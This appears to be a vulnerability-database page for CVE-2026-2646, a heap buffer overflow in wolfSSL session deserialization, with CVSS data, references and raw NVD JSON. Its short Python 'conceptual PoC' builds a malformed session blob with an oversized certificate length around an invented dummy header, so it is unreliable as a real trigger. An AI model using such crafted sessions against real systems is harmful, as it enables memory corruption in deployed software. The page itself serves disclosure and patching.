CVE-2026-2646

Description

A heap-buffer-overflow vulnerability exists in wolfSSL's wolfSSL_d2i_SSL_SESSION() function. When deserializing session data with SESSION_CERTS enabled, certificate and session id lengths are read from an untrusted input without bounds validation, allowing an attacker to overflow fixed-size buffers and corrupt heap memory. A maliciously crafted session would need to be loaded from an external source to trigger this vulnerability. Internal sessions were not vulnerable.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:* - VULNERABLE

wolfSSL (具体受影响版本请参考GitHub PR #9748和#9949)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct

# This is a conceptual PoC to demonstrate the vulnerability trigger.
# It crafts a malicious SSL session structure with an oversized certificate length.

def create_malformed_session():
    header = b'\x00\x00'  # Dummy header
    # Set an arbitrarily large length for the certificate to trigger overflow
    # Normally this would be a reasonable size, but here we use 0xFFFFFFFF
    malicious_cert_len = struct.pack('>I', 0xFFFFFFFF)
    
    # Construct the payload
    # Structure: [Header][Malicious Cert Length][Dummy Data...]
    payload = header + malicious_cert_len + b'A' * 100
    
    print("Generated malformed session payload.")
    print(f"Payload hex: {payload.hex()}")
    return payload

if __name__ == "__main__":
    create_malformed_session()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2646
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2646
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2646/
[4] VulDB https://vuldb.com/cve/CVE-2026-2646
[5] https://github.com/wolfSSL/wolfssl/pull/9748
[6] https://github.com/wolfSSL/wolfssl/pull/9949

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2646", "sourceIdentifier": "[email protected]", "published": "2026-03-19T18:16:22.223", "lastModified": "2026-04-29T18:42:47.640", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A heap-buffer-overflow vulnerability exists in wolfSSL's wolfSSL_d2i_SSL_SESSION() function. When deserializing session data with SESSION_CERTS enabled, certificate and session id lengths are read from an untrusted input without bounds validation, allowing an attacker to overflow fixed-size buffers and corrupt heap memory. A maliciously crafted session would need to be loaded from an external source to trigger this vulnerability. Internal sessions were not vulnerable."}, {"lang": "es", "value": "Una vulnerabilidad de desbordamiento de búfer de montón existe en la función wolfSSL_d2i_SSL_SESSION() de wolfSSL. Al deserializar datos de sesión con SESSION_CERTS habilitado, las longitudes del certificado y del ID de sesión se leen de una entrada no confiable sin validación de límites, permitiendo a un atacante desbordar búferes de tamaño fijo y corromper la memoria del montón. Una sesión creada maliciosamente necesitaría ser cargada desde una fuente externa para activar esta vulnerabilidad. Las sesiones internas no eran vulnerables."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.9.0", "matchCriteriaId": "DA3FA1CB-CEDC-4D49-9ECD-99BBF1602312"}]}]}], "references": [{"url": "https://github.com/wolfSSL/wolfssl/pull/9748", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/wolfSSL/wolfssl/pull/9949", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}